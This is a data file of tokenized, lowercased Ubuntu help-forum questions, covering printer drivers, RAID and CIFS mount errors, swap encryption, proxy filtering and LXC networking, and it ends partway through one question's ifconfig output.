522390	restart process and direct it to right display via ssh	i am using xbmc as the primary media player in my home , and it is great . the one problem i have is that it sometimes -- not often , but sometimes -- crashes or freezes up . for me , that is no problem , but for the rest of the family i need a solution where they can restart xbmc from their own macs short of restarting the nas on which the xbmc is located the 'hard ' way , ie with the power cord ( that they can ) . my current idea is a copy-and-paste checklist for them for ssh-ing into the machine from mac terminal . but i am not knowledgeable enough to know how to start xbmc on the right display . when i just start ( or kill and start ) the process from ssh , it seems to me that it tries to direct it to the ( non-existent ) , and just complains when that does not work . so how do i tell it to start the program on the right ( ie tv ) display ? of course , if there is a better suggestion than my ssh idea out there , that is welcome as well . the overarching aim is that my computer illiterate family may all restart xbmc without having to deal with the linux gui directly , since that is all greek to them ( and they are swedes like me ) .
522394	how to install a printer & scanner canon mp630	as a newcomer to ubuntu ( version 14.04 lts ) and not being a computer expert i try to connect my printer/scanner canon pixma mp630 . i added it in system settings printer and now i can print from the computer but do not get info e.g . for ink status , and i can not scan to the computer . i have not found the word scanner in system settings . then , i have downloaded the actual canon driver software from their homepage , then downloaded and installed libcupsys2 from here : https : //launchpad.net/ubuntu/karmic/i386/libcupsys2-dev/1.4.0-3 . then all attempts to install the canon stuff failed for not fullfillible dependencies with the comment libcupsys2 ( > =1.2.1 ) . then , i followed the recommendation from how to install canon pixma mp620 ? and entered into the terminal : sudo apt-get install cups-backend-bjnp but did not see any change . can anyone advise what to try next in order to get full functionality for printing and scanning ?
522397	how to install downloaded g++4.8 deb archive in ubuntu 14.04 lts ?	i have installed ubuntu 14.04 lts . the g++ compiler is missing in it . so , i downloaded g++ 4.8 deb archive . but i am not able to install it . ehn i open the package , ubuntu software center opens up and says dependency is not satisfiable : libstdc++-4.8-dev . please help .
522400	usb-imagewriter	how to ubuntu 14.04.1 lts install usb-imagewriter ? this program is not in the software center , and essential to me because ubuntu startup disc creator can not create live usb for other linux distributions , but only for ubuntu iso image .
522401	como usar o ubunto para dj	hello i work as a dj and already managed to install once more tracktor in ubuntu was wondering if someone already installed the drive pionner cdj system and have any tips to give me
522403	how ti install rockettraid642l with ubuntu 14.04 kernel 3.15 . getting reset errors	installed a sansdigital box with a highpoint rr642l controller . originally i was told to go to the newest kernel , now they say no , 3.6 is as high as they go . i am on 3.15 and keeping getting the following in dmesg : [ 51729.390248 ] rr640l : [ 0 1 2 ] start device soft reset . [ 51730.095320 ] rr640l : [ 0 0 3 ] config_device path_id :0 [ 51730.106268 ] rr640l : [ 0 0 ] port started successfully . [ 51730.106271 ] rr640l : [ 0 0 2 ] device done to reset ( reset 2 ) [ 51730.106272 ] rr640l : [ 0 0 3 ] device done to reset ( reset 2 ) [ 51730.111252 ] rr640l : [ 0 1 2 ] config_device path_id :1 [ 51730.112249 ] rr640l : [ 0 1 3 ] start device soft reset . [ 51730.764454 ] rr640l : [ 0 1 3 ] config_device path_id :1 [ 51730.775400 ] rr640l : [ 0 1 ] port started successfully . [ 51730.775402 ] rr640l : [ 0 1 1 ] device done to reset ( reset 2 ) [ 51730.775404 ] rr640l : [ 0 1 2 ] device done to reset ( reset 2 ) [ 51730.775405 ] rr640l : [ 0 1 3 ] device done to reset ( reset 1 ) [ 51733.453605 ] rr640l : [ 0 2 ] start port . [ 51733.453610 ] rr640l : [ 0 2 ] start port hard reset ( probe 1 ) . [ 51733.652062 ] rr640l : [ 0 3 ] start port . [ 51733.652064 ] rr640l : [ 0 3 ] start port hard reset ( probe 1 ) . [ 51733.855569 ] rr640l : hpt_reset ( 12/0/0 ) [ 51734.870268 ] rr640l : [ 0 1 1 ] start device soft reset . [ 51735.602388 ] rr640l : [ 0 1 1 ] config_device path_id :1 [ 51735.615326 ] rr640l : [ 0 1 ] port started successfully . [ 51735.615328 ] rr640l : [ 0 1 1 ] device done to reset ( reset 3 ) [ 51736.425514 ] rr640l : [ 0 0 ] port started successfully . [ 51737.024699 ] rr640l : [ 0 2 ] failed to hard reset . [ 51737.024706 ] rr640l : [ 0 2 ] failed to perform port hard reset . [ 51737.228735 ] rr640l : [ 0 3 ] failed to hard reset . [ 51737.228742 ] rr640l : [ 0 3 ] failed to perform port hard reset . [ 51743.858012 ] sd 12:0:0:0 : device offlined - not ready after error recovery [ 51743.862057 ] sd 12:0:0:0 : [ sdd ] unhandled error code [ 51743.862061 ] sd 12:0:0:0 : [ sdd ] [ 51743.862064 ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 51743.862066 ] sd 12:0:0:0 : [ sdd ] cdb : [ 51743.862067 ] read ( 16 ) : 88 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 [ 51743.862078 ] end_request : i/o error , dev sdd , sector 0 [ 51743.863600 ] quiet_error : 45 callbacks suppressed [ 51743.863602 ] buffer i/o error on device sdd , logical block 0 [ 51743.865345 ] ldm_validate_partition_table ( ) : disk read failed . [ 51743.865365 ] dev sdd : unable to read rdb block 0 [ 51743.865391 ] sdd : unable to read partition table [ 51743.865623 ] sd 12:0:0:0 : [ sdd ] read capacity ( 16 ) failed [ 51743.865626 ] sd 12:0:0:0 : [ sdd ] [ 51743.865628 ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 51743.865629 ] sd 12:0:0:0 : [ sdd ] sense not available . [ 51743.865664 ] sd 12:0:0:0 : [ sdd ] read capacity failed [ 51743.865666 ] sd 12:0:0:0 : [ sdd ] [ 51743.865668 ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 51743.865669 ] sd 12:0:0:0 : [ sdd ] sense not available . [ 51743.865729 ] sd 12:0:0:0 : [ sdd ] attached scsi disk [ 51754.106367 ] rr640l : [ 0 1 ] port handle error ( irq status 08000000 ) [ 51754.106372 ] rr640l : [ 0 1 ] target interface fatal error [ 51755.529212 ] rr640l : [ 0 1 3 ] start device soft reset . [ 51756.277350 ] rr640l : [ 0 1 3 ] config_device path_id :1 [ 51756.288301 ] rr640l : [ 0 1 ] port started successfully . [ 51756.288304 ] rr640l : [ 0 1 3 ] device done to reset ( reset 2 ) [ 51775.969117 ] rr640l : [ 0 0 2 ] start device soft reset . [ 51776.705257 ] rr640l : [ 0 1 1 ] start device soft reset . [ 51777.357394 ] rr640l : [ 0 0 2 ] config_device path_id :0 [ 51777.368344 ] rr640l : [ 0 0 ] port started successfully . [ 51777.368346 ] rr640l : [ 0 0 2 ] device done to reset ( reset 1 ) [ 51777.433376 ] rr640l : [ 0 1 1 ] config_device path_id :1 [ 51777.434375 ] rr640l : [ 0 1 3 ] start device soft reset . [ 51778.177513 ] rr640l : [ 0 1 3 ] config_device path_id :1 [ 51778.188462 ] rr640l : [ 0 1 ] port started successfully . [ 51778.188464 ] rr640l : [ 0 1 1 ] device done to reset ( reset 4 ) [ 51778.188468 ] rr640l : [ 0 1 3 ] device done to reset ( reset 3 ) [ 51795.010163 ] rr640l : [ 0 1 ] port handle error ( irq status 08000000 ) [ 51795.010168 ] rr640l : [ 0 1 ] target interface fatal error [ 51796.429032 ] rr640l : [ 0 1 3 ] start device soft reset . [ 51797.181146 ] rr640l : [ 0 1 3 ] config_device path_id :1 [ 51797.192096 ] rr640l : [ 0 1 ] port started successfully . [ 51797.192098 ] rr640l : [ 0 1 3 ] device done to reset ( reset 4 ) [ 51815.238029 ] rr640l : [ 0 1 ] port handle error ( irq status 08000000 ) [ 51815.238034 ] rr640l : [ 0 1 ] target interface fatal error [ 51816.656880 ] rr640l : [ 0 1 3 ] start device soft reset . [ 51817.397000 ] rr640l : [ 0 1 3 ] config_device path_id :1 [ 51817.407950 ] rr640l : [ 0 1 ] port started successfully . [ 51817.407952 ] rr640l : [ 0 1 3 ] device done to reset ( reset 5 ) [ 51835.259466 ] rr640l : [ 0 1 3 ] too many resets - make device offline . [ 51856.932545 ] rr640l : [ 0 0 2 ] start device soft reset . [ 51857.580716 ] rr640l : [ 0 1 1 ] start device soft reset . [ 51858.252811 ] rr640l : [ 0 0 2 ] config_device path_id :0 [ 51858.263759 ] rr640l : [ 0 0 ] port started successfully . [ 51858.263763 ] rr640l : [ 0 0 2 ] device done to reset ( reset 2 ) [ 51858.288804 ] rr640l : [ 0 1 1 ] config_device path_id :1 [ 51858.299752 ] rr640l : [ 0 1 ] port started successfully . [ 51858.299754 ] rr640l : [ 0 1 1 ] device done to reset ( reset 5 ) [ 51921.174557 ] rr640l : [ 0 2 ] start port . [ 51921.174562 ] rr640l : [ 0 2 ] start port hard reset ( probe 1 ) . [ 51921.373014 ] rr640l : [ 0 3 ] start port . [ 51921.373016 ] rr640l : [ 0 3 ] start port hard reset ( probe 1 ) . [ 51923.633302 ] rr640l : [ 0 0 0 ] start device soft reset . [ 51924.281477 ] rr640l : [ 0 1 0 ] start device soft reset . [ 51925.003527 ] rr640l : [ 0 0 0 ] config_device path_id :0 [ 51925.004527 ] rr640l : [ 0 0 1 ] start device soft reset . [ 51925.659642 ] rr640l : [ 0 1 0 ] config_device path_id :1 [ 51925.660641 ] rr640l : [ 0 1 3 ] start device soft reset . [ 51926.387788 ] rr640l : [ 0 0 1 ] config_device path_id :0 [ 51926.400727 ] rr640l : [ 0 0 ] port started successfully . [ 51926.400729 ] rr640l : [ 0 0 0 ] device probed successfully . [ 51926.438241 ] rr640l : backup stamp 5261775f sum 0 backed 1 [ 51926.446195 ] rr640l : master stamp 5261775f sum 0 backed 1 [ 51926.446198 ] rr640l : raw ffff8808506f5438 bad_sector 0 can anybody help me ?
522408	is there a possibility to change the swap encryption method at runtime ?	i 'd like to have both hibernation capabilities and encrypted swap partition ( s ) on my ubuntu 14.04.1 system . after a short experience of a luks encrypted swap partition i decided that entering the luks password beside my user account password at every startup is too annoying ( also because i do n't use hibernation that often ) . i was thinking that an interesting alternative would be to change the encryption type of the swap partition at runtime from random key to a fixed password just before hibernating and using this password to boot from the hibernation at the next boot . is that possible ? inacceptable solutions are : providing a second swap partition ( i could waste 10 gb , so i 'm opposed for sake of elegance ; i 'm also uncertain how to tell the system how to use the random key partition for normal system boots and the luks password partition after hibernation ) any other solution requiring a second password to be typed in during system start ( afaik after logging into user account basically anything can en- and decrypted with the keyring ) accepatble solutions include : routines/custom scripts which take ~ 2 minutes longer than the hibernation process with a luks password encrypted partition . i 'm familiar with swap encryption and hibernating ( good question and very good answer , but not what i 'm looking for - and after all not an answer to my quite specific question01 ) and https : //help.ubuntu.com/community/enablehibernatewithencryptedswap background : my own idea has been so far to split the x gb swap parition in pieces of 500 mb or 1 gb , and process them in a row as follows : empty the partition with swapoff remove random key encrypted swap capabilites overwrite with luks password encrypted swap capabilities reenable the partition with swapon but i do n't know whether the answer to my question is ~yes and how to tell the system to boot from > 1 different swap partitions after hibernation ( i 'll ask that in a different querstion ! ) !
522412	how to disable program switching ( all+tab equivalent ) with the mouse ?	i 'm using ubuntu 14.04 and want to stop programs switching ( equivalent of alt+tab ) in response to mouse gestures . right now it happens all the time when i use the mouse , i 'm not even sure what gestures cause it . i poked around settings but could n't find anything related , and turning off two finger scrolling did n't stop it . if anyone has any ideas how i could customize that it would be very much appreciated ! ( further info : i use the trackpad on an asus x501a as my mouse . it 's a button-less touch-area with right and left click designated in the bottom approximately quarter inch of the area )
522414	what printer model have i to choose for toshiba e-studio 2330c ?	i 'm unable to find this model in the list of available toshiba models . would you mind telling me a compatible one ?
522415	problem with remote printing using rsh	this is really a unix/linux problem than an ubuntuproblem , so perhaps this is the wrong forum , but i 'll post it anyway . when i type the commandline command rsh -l < myname > < ipaddress > /usr/bin/lpr - # 2 < filename > i get the following puzzling , rather unhelpful error /usr/bin/lpr : error - unknown option `` the remote command works fine without the - # flag , and locally the lpr command works fine with the - # flag , so it must have something to do with the way rsh processes the # sign . could anybody advise please ? thanks very much for any assistance !
522417	ca n't boot linux from an external usb ssd drive	windows 7 os . is there any difference between linux live cd and linux installation on an external usb ssd drive in point of view of boot ? i can boot linux livecd without a problem when set boot order to `` cd/dvd '' in boot menu setup , but ca n't boot linux from ssd drive when set boot order to `` usb storage '' in boot menu . when i try to boot linux from ssd drive , it just hungs on black screen with message and a blinking cursor : grub loading . welcome to grub ! _ at the end of linux installation , grub was installed on `` /dev/sdb '' ( ssd drive ) . boot info script results .
522418	meeting my video editor needs	i plan to work on 2d/3d images so gimp and blender seem like the best choice to me but i need a video editor that will compile the two to create my videos . if anyone needs more guidance , i 'm trying to recreate the star trek : the next generation title sequence but replace the voice over and text with colleagues names as a little joke . any help would be appreciated ! -trey
522420	how to get default gateway with a dhcp	i have ubuntu 12.04 and i have configured /etc/network/interfaces like this auto eth2 iface eth2 inet dhcp i also have auto eth1 iface eth1 inet static address 60.60.60.1 netmask 255.255.255.0 network 60.60.60.0 broadcast 60.60.60.255 and eth0 is similarly configured . when i do sudo route i do n't see default gw . i just see 60.60.60.0 * 255.255.255.0 eth1 and similarly 10.0.0.0 * 255.255.255.0 u 0 0 0 eth2 since the default gw is not present , i have got a proper 10.x.x.x ip address but no way to connect outside . how do i get the default gw automatically setup . i can add it using route add default gw and that works . but when i move locations , then i will have to keep on setting route add at every place manually
522428	how can i possibly install ubuntu 14.04 on my nexus 7	i have a nexus 7 and i want to install ubuntu 14.04 ( not ubuntu touch ) on it , i 'm aware that it was available on 13.04 byt can it be done on 14.04 ? i have my bootloader unlocked . my nexus 7 ( 2013 version ) is also rooted .
522430	how to save output to file that required root access	i want to save output of command to a file that my current user do not have access to . but my user can have root access using sudo . i 'm running for example : sudo crontab -l > /var/backup/crontab -bash : sudo : permission denied but i can run just sudo crontab -l so i think sudo relevant only to crontab command and as user do not have access to /var/backup/crontab it gives such error . is it possible to write output to a file that requires root access under current user ?
522431	how to send an email using command line ?	here 's what i have : cat userreport.txt | mail -s `` testsubject '' `` nospam @ gmail.com '' it 's a small file , much smaller than a picture so it should send almost instantly . though i receive nothing . i installed mailutils but might have installed it incorrectly . how can i send an email from a bash script ?
522432	audio problem with 14.04 and mp3	i downloaded 14.04 onto computer with working 12.04 . i have audio problem when i try to play mp3 . the audio sounds like there are two sources running . it gives an echo sound . you tube audio works fine . i have installed restricked extras . how do i fix this ? thanks jimmy
522435	is it safe to install ubuntu 14.04 packages on kubuntu 14.04 ?	i have ubuntu 14.04.1 lts installed on my computer and a friend of mine has kubuntu 14.04 trusty tahr installed on his machine , which has no connection to the internet . i want to share with him some packages i 've installed on my ubuntu ( such as texlive-full , for example ) , basically i 'll copy and paste /var/cache/apt/packages to his machine ( i have a really slow connection to the internet ) . it that possible ? could anything go wrong ?
522436	no longer able to move messages in thunderbird using hud in ubuntu 14.04	i used to use the hud in thunderbird to move email messages to different folders . i found this a useful feature in ubuntu 12.04 as i have a lot of email folders and it is quicker to use the hud than using the right click menu to navigate through all of my folders . i simply needed to press 'alt ' to bring up the hud and then type `` move to `` ( actually you could shorten this further to `` mo `` ) . i 've recently upgraded to ubuntu 14.04 and this no longer seems to work . i can still access the hud and complete actions such as `` new message '' but i ca n't move messages to other folders . does anyone know why this is and if it is possible to get this functionality back ? thanks for your help .
522438	ubuntu 14.04 lts 'trusty tahr ' frozen on ubuntu opening screen	i have installed ubuntu 14.04 lts 'trusty tahr ' from ubuntu 12.04 lts . the installation was executed as an ubuntu upgrade within ubuntu 12.04 . the problem is the screen freezes prior to login . the ubuntu logo appears and that computer freezes . the disk light is not flickering , which suggests that nothing is happening . i have attempted the unity re-install using ctrl+alt+f2 , which is suggested in another post . i am using a 64 bit lenovo thinkpad with 16 gb of ram .
522442	can not access windows share on netapp from xubuntu 14.04 using samba	since i used to mount samba share on netapp with a command like : mount -t cifs //netapp.dns.name/myshare /home/myhome/myshare -- verbose -o credential=/home/myhome/.credential , sec=ntlm , iocharset=utf8 , dir_mode=0777 , file_mode=0666 , nounix , noserverino last week , there was ok , but monday i got this error : domain=mydomain mount.cifs kernel mount options : ip=10.nnn.nnn.nnn , unc=\\netapp.dns.name\my.login , sec=ntlm , iocharset=utf8 , dir_mode=0777 , file_mode=0666 , nounix , noserverino , user=olivier.savoye , ,domain=mydomain , pass=******** mount error ( 5 ) : input/output error refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) here are syslog messages : sep 10 17:26:47 my-box kernel : [ 27249.959105 ] cpu : 2 pid : 10264 comm : mount.cifs tainted : g w ox 3.13.0-36-generic # 63-ubuntu sep 10 17:26:47 my-box kernel : [ 27249.959110 ] hardware name : toshiba portege r930/portege r930 , bios version 6.70 04/04/2013 sep 10 17:26:47 my-box kernel : [ 27249.959114 ] 0000000000000009 ffff8801eeacfbb0 ffffffff8171e569 ffff8801eeacfbf8 sep 10 17:26:47 my-box kernel : [ 27249.959122 ] ffff8801eeacfbe8 ffffffff8106775d ffff8801eeacfd00 ffff8800a3597400 sep 10 17:26:47 my-box kernel : [ 27249.959128 ] ffff8801eeacfcc8 0000000000000001 0000000000000000 ffff8801eeacfc48 sep 10 17:26:47 my-box kernel : [ 27249.959135 ] call trace : sep 10 17:26:47 my-box kernel : [ 27249.959146 ] [ < ffffffff8171e569 > ] dump_stack+0x45/0x56 sep 10 17:26:47 my-box kernel : [ 27249.959155 ] [ < ffffffff8106775d > ] warn_slowpath_common+0x7d/0xa0 sep 10 17:26:47 my-box kernel : [ 27249.959161 ] [ < ffffffff810677cc > ] warn_slowpath_fmt+0x4c/0x50 sep 10 17:26:47 my-box kernel : [ 27249.959180 ] [ < ffffffffa08c04c5 > ] smb_send_rqst+0x215/0x270 [ cifs ] sep 10 17:26:47 my-box kernel : [ 27249.959191 ] [ < ffffffff81690218 > ] ? __inet_stream_connect+0x208/0x320 sep 10 17:26:47 my-box kernel : [ 27249.959206 ] [ < ffffffffa08c055d > ] smb_sendv+0x3d/0x40 [ cifs ] sep 10 17:26:47 my-box kernel : [ 27249.959218 ] [ < ffffffffa08c0588 > ] smb_send+0x28/0x30 [ cifs ] sep 10 17:26:47 my-box kernel : [ 27249.959232 ] [ < ffffffffa08aa15d > ] generic_ip_connect+0x30d/0x3e0 [ cifs ] sep 10 17:26:47 my-box kernel : [ 27249.959243 ] [ < ffffffff811a1d65 > ] ? __kmalloc+0x55/0x230 sep 10 17:26:47 my-box kernel : [ 27249.959258 ] [ < ffffffffa08ae69c > ] cifs_mount+0x85c/0xaf0 [ cifs ] sep 10 17:26:47 my-box kernel : [ 27249.959270 ] [ < ffffffffa089d040 > ] cifs_do_mount+0xa0/0x4d0 [ cifs ] sep 10 17:26:47 my-box kernel : [ 27249.959280 ] [ < ffffffff811c10a9 > ] mount_fs+0x39/0x1b0 sep 10 17:26:47 my-box kernel : [ 27249.959288 ] [ < ffffffff811dc447 > ] vfs_kern_mount+0x67/0x110 sep 10 17:26:47 my-box kernel : [ 27249.959295 ] [ < ffffffff811deca4 > ] do_mount+0x244/0xb20 sep 10 17:26:47 my-box kernel : [ 27249.959304 ] [ < ffffffff811530be > ] ? __get_free_pages+0xe/0x50 sep 10 17:26:47 my-box kernel : [ 27249.959310 ] [ < ffffffff811de8e6 > ] ? copy_mount_options+0x36/0x170 sep 10 17:26:47 my-box kernel : [ 27249.959316 ] [ < ffffffff811df873 > ] sys_mount+0x83/0xc0 sep 10 17:26:47 my-box kernel : [ 27249.959323 ] [ < ffffffff8172efad > ] system_call_fastpath+0x1a/0x1f sep 10 17:26:47 my-box kernel : [ 27249.959327 ] -- - [ end trace fb88cd9d7babdcb1 ] -- - sep 10 17:26:47 my-box kernel : [ 27249.961344 ] cifs vfs : error connecting to socket . aborting operation . sep 10 17:26:47 my-box kernel : [ 27249.961529 ] cifs vfs : cifs_mount failed w/return code = -5 there was no modification on domain or netapp configuration . my credential did n't change . i looked for updates i did last week-end : 2014-09-05 22:37:53 upgrade libgcrypt11-dev : amd64 1.5.3-2ubuntu4 1.5.3-2ubuntu4.1 2014-09-05 22:37:54 upgrade libgcrypt11 : i386 1.5.3-2ubuntu4 1.5.3-2ubuntu4.1 2014-09-05 22:37:55 upgrade exo-utils : amd64 0.10.2-3ubuntu1 0.10.2-3ubuntu1.14.04.1 2014-09-05 22:37:55 upgrade libgcrypt11 : amd64 1.5.3-2ubuntu4 1.5.3-2ubuntu4.1 2014-09-05 22:37:56 upgrade libexo-common : all 0.10.2-3ubuntu1 0.10.2-3ubuntu1.14.04.1 2014-09-05 22:37:57 upgrade libexo-1-0 : amd64 0.10.2-3ubuntu1 0.10.2-3ubuntu1.14.04.1 2014-09-05 22:37:57 upgrade libexo-helpers : amd64 0.10.2-3ubuntu1 0.10.2-3ubuntu1.14.04.1 2014-09-05 22:37:58 upgrade liblua5.1-0 : amd64 5.1.5-5 5.1.5-5ubuntu0.1 2014-09-05 22:37:59 upgrade ubuntu-drivers-common : amd64 1:0.2.91.6 1:0.2.91.7 2014-09-05 22:38:00 upgrade linux-libc-dev : amd64 3.13.0-35.62 3.13.0-36.63 2014-09-05 22:38:02 status installed desktop-file-utils : amd64 0.22-1ubuntu1 2014-09-05 22:38:02 status installed gnome-menus : amd64 3.10.1-0ubuntu2 2014-09-05 22:38:02 status installed man-db : amd64 2.6.7.1-1 2014-09-05 22:38:03 status installed mime-support : all 3.54ubuntu1 2014-09-05 22:38:06 status installed hicolor-icon-theme : all 0.13-1 2014-09-05 22:38:06 status installed ureadahead : amd64 0.100.0-16 2014-09-05 22:38:07 status installed libexo-common : all 0.10.2-3ubuntu1.14.04.1 2014-09-05 22:38:07 status installed libexo-helpers : amd64 0.10.2-3ubuntu1.14.04.1 2014-09-05 22:38:07 status installed libgcrypt11 : amd64 1.5.3-2ubuntu4.1 2014-09-05 22:38:07 status installed libgcrypt11-dev : amd64 1.5.3-2ubuntu4.1 2014-09-05 22:38:07 status installed libgcrypt11 : i386 1.5.3-2ubuntu4.1 2014-09-05 22:38:08 status installed exo-utils : amd64 0.10.2-3ubuntu1.14.04.1 2014-09-05 22:38:08 status installed libexo-1-0 : amd64 0.10.2-3ubuntu1.14.04.1 2014-09-05 22:38:08 status installed liblua5.1-0 : amd64 5.1.5-5ubuntu0.1 2014-09-05 22:38:09 status installed libc-bin : amd64 2.19-0ubuntu6.3 2014-09-05 22:38:09 status installed linux-libc-dev : amd64 3.13.0-36.63 2014-09-05 22:38:09 status installed ubuntu-drivers-common : amd64 1:0.2.91.7 2014-09-05 22:44:29 upgrade linux-generic : amd64 3.13.0.35.42 3.13.0.36.43 2014-09-05 22:44:29 upgrade linux-image-generic : amd64 3.13.0.35.42 3.13.0.36.43 2014-09-05 22:44:37 upgrade linux-headers-generic : amd64 3.13.0.35.42 3.13.0.36.43 2014-09-05 22:45:39 status installed linux-image-3.13.0-36-generic : amd64 3.13.0-36.63 2014-09-05 22:45:52 status installed linux-image-extra-3.13.0-36-generic : amd64 3.13.0-36.63 2014-09-05 22:45:53 status installed linux-headers-3.13.0-36 : all 3.13.0-36.63 2014-09-05 22:45:53 status installed linux-image-generic : amd64 3.13.0.36.43 2014-09-05 22:45:54 status installed linux-generic : amd64 3.13.0.36.43 2014-09-05 22:45:54 status installed linux-headers-3.13.0-36-generic : amd64 3.13.0-36.63 2014-09-05 22:45:54 status installed linux-headers-generic : amd64 3.13.0.36.43 2014-09-05 22:49:10 status installed libqgispython2.4.0 : amd64 2.4.0+trusty1 2014-09-05 22:49:10 status installed libqscintilla2-11 : amd64 2.8.1-2ubuntu1 2014-09-05 22:49:10 status installed libqscintilla2-l10n : all 2.8.1-2ubuntu1 2014-09-05 22:49:10 status installed python-psycopg2 : amd64 2.4.5-1build5 2014-09-05 22:49:10 status installed python-qgis-common : all 2.4.0+trusty1 2014-09-05 22:49:11 status installed libc-bin : amd64 2.19-0ubuntu6.3 2014-09-05 22:49:11 status installed python-pyspatialite : amd64 3.0.1-4 2014-09-05 22:49:11 status installed python-qgis : amd64 2.4.0+trusty1 2014-09-05 22:49:11 status installed python-qscintilla2 : amd64 2.8.1-2ubuntu1 i do n't see anything that could have an effect on my cifs mount except ( perhaps ) the libgcrypt11 package . i do n't try to remove it for an older because i am not sure it can help . could someone give me some advice ?
522443	i 've installed ubuntu ; how do i start it ?	i 'm a newbe to ubuntu i have installed ubuntu via a cd . after the successful installation , i was asked to reboot . upon restart , only win8 appears . is there a way to choose between win & ubuntu ?
522446	problem in publishing paid app in ubuntu app developer	i want to publish an paid app in ubuntu app developer , i also complete the form of information about me and i have complete the information of the app , then when i will post it for review it gives me an error : `` payment details are required before any application can be reviewed. '' . i already done that ! the app is for desktops and i have account in launchpad.net do i need to create another account ?
522448	uninstall eigen 3.0.5	in short , i believe that my question is about how to properly uninstall eigen 3.0.5 , but here is a brief story of how i got myself into a mess : i did sudo apt-get install libeigen3-dev ; however , i forgot that i did not update my gcc and g++ on ubuntu 12.04 yet , and therefore eigen 3.0.5 version got installed , i want a newer version . i tried to uninstall eigen with sudo -rm -r /usr/include/eigen3 which was probably a big mistake , because when i do sudo apt-get install libeigen3-dev again , i get : reading package lists ... done building dependency tree reading state information ... done libeigen3-dev is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 40 not upgraded . which tells me that i really did n't uninstall eigen . also , i do not have an eigen3 folder in my include folder ; therefore , i ca n't use any version of eigen . i feel like my problem will be solved if i properly uninstall eigen 3.0.5 , how should i do that ? i saw this related question , but it did not help me .
522450	is there a way i can use ubuntu as a proxy server , including me the chance to create temporary users and passwords ?	i would like to ask ... i´m working in the network maintenance of some high schools here in my city , and one of the principals asked me if there is a chance to create some free access points for the students , with some restrictions also , some are that they can not access social networks , youtube and restricted or porn pages , and also if there´s a possibility to provide these accesses with temporary users and passwords ... the first part is simple , but for the second one i´m not sure what to do ... i know , for example , that the fortinet switches and routers have this option , they can create generic users and passwords for maybe three hours or so , but i´m not sure if this is possible with free software ... a fortinet switch is up to $ 3000 depending the place where you get it , and for the budget´s high school it is too difficult to get it ... . so , i was wondering if you guys can advice me if there is something into the ubuntu´s world i can use to do that , i do really appreciate the help you can provide me ... thanks a lot !
522451	hud not working on ubuntu 14.04	when i press alt i can see the search field , but when i start to type i get no results . this issue is present on every application ( e.g . nautilus , gimp , firefox ) . how can i solve it ?
522453	quicktime in ubuntu 14.04	can anybody play properly this video in ubuntu 14.04 ( 64 bits ) , in any browser ? http : //www.apple.com/live/2014-sept-event/ i have quicktime plugin in firefox and the video does play , however only sound , no picture . everything is up-to-date . thank you in advance .
522455	failed to load module âcanberra-gtk-moduleâ	i just installed ubuntu saucy with unity on an acer c720 . i downloaded software center from synaptic and when i type in gksu software-center i get the error , failed to load module `` canberra-gtk-module . '' i also tried the following : sudo apt-get install libcanberra-gtk-module sudo apt-get install libcanberra-gtk-module : i386 for both , i get the following : e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) i am brand new to ubuntu , so any help would be greatly appreciated .
522457	lxc container no outgoing traffic with bridged network and public ip address	i try to setup a lxc container with bridged network on ubuntu 14.04.1 , but the outgoing traffic seems to be blocked . ping another ip than the container 's one is not working . actually i tried this with a working container of a ubuntu 12.04 host moved to new hardware and a recent ubuntu 14.04 , but the problem also applies to a new created ubuntu 14.04 container . i should mention that if i bind the ip address to an aliasing interface of the host directly , pinging inside and outside to the host is working correctly . i hope someone has an idea what i am doing wrong . i created a the new container with : lxc-create -t ubuntu -n ubuntu-test this is my config file : # template used to create this container : /usr/share/lxc/templates/lxc-ubuntu # parameters passed to the template : -r trusty # for additional config options , please look at lxc.container.conf ( 5 ) # common configuration lxc.include = /usr/share/lxc/config/ubuntu.common.conf # container specific configuration lxc.rootfs = /var/lib/lxc/ubuntu-test/rootfs lxc.mount = /var/lib/lxc/ubuntu-test/fstab lxc.utsname = ubuntu-test lxc.arch = amd64 # network configuration lxc.network.type = veth lxc.network.flags = up lxc.network.link = br0 lxc.network.hwaddr = 00:16:3e:6c:7c:79 lxc.network.ipv4=91.143.88.119/24 lxc.network.ipv4.gateway=91.143.88.1 lxc.network.name=eth0 my '/etc/network/interfaces ' on the host : auto lo iface lo inet loopback auto br0 iface br0 inet static address 81.7.15.233 netmask 255.255.255.0 broadcast 81.7.15.255 gateway 81.7.15.1 bridge_ports eth0 bridge_fd 0 bridge_stp off bridge_waitport 0 bridge_maxwait 0 and on the client : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 91.143.88.119 netmask 255.255.255.0 broadcast 91.143.88.255 gateway 91.143.88.1 ip forwarding is enabled : cat /proc/sys/net/ipv4/ip_forward 1 'iptables-save ' shows # generated by iptables-save v1.4.21 on wed sep 10 18:26:23 2014 *mangle : prerouting accept [ 20035:4192692 ] : input accept [ 7193:3225426 ] : forward accept [ 2677:191017 ] : output accept [ 381:36624 ] : postrouting accept [ 3058:227641 ] -a postrouting -o lxcbr0 -p udp -m udp -- dport 68 -j checksum -- checksum-fill commit # completed on wed sep 10 18:26:23 2014 # generated by iptables-save v1.4.21 on wed sep 10 18:26:23 2014 *nat : prerouting accept [ 10474:819973 ] : input accept [ 282:41644 ] : output accept [ 7:537 ] : postrouting accept [ 57:4274 ] -a postrouting -s 10.0.3.0/24 ! -d 10.0.3.0/24 -j masquerade commit # completed on wed sep 10 18:26:23 2014 # generated by iptables-save v1.4.21 on wed sep 10 18:26:23 2014 *filter : input accept [ 7193:3225426 ] : forward accept [ 2677:191017 ] : output accept [ 381:36624 ] -a input -i lxcbr0 -p tcp -m tcp -- dport 53 -j accept -a input -i lxcbr0 -p udp -m udp -- dport 53 -j accept -a input -i lxcbr0 -p tcp -m tcp -- dport 67 -j accept -a input -i lxcbr0 -p udp -m udp -- dport 67 -j accept -a forward -o lxcbr0 -j accept -a forward -i lxcbr0 -j accept commit # completed on wed sep 10 18:26:23 2014 output of 'brctl show' bridge name bridge id stp enabled interfaces br0 8000.0025905700f8 no eth0 vethrtx30h lxcbr0 8000.000000000000 no my host 's ifconfig : br0 link encap : ethernet hardware adresse 00:25:90:57:00 : f8 inet adresse:81.7.15.233 bcast:81.7.15.255 maske:255.255.255.0 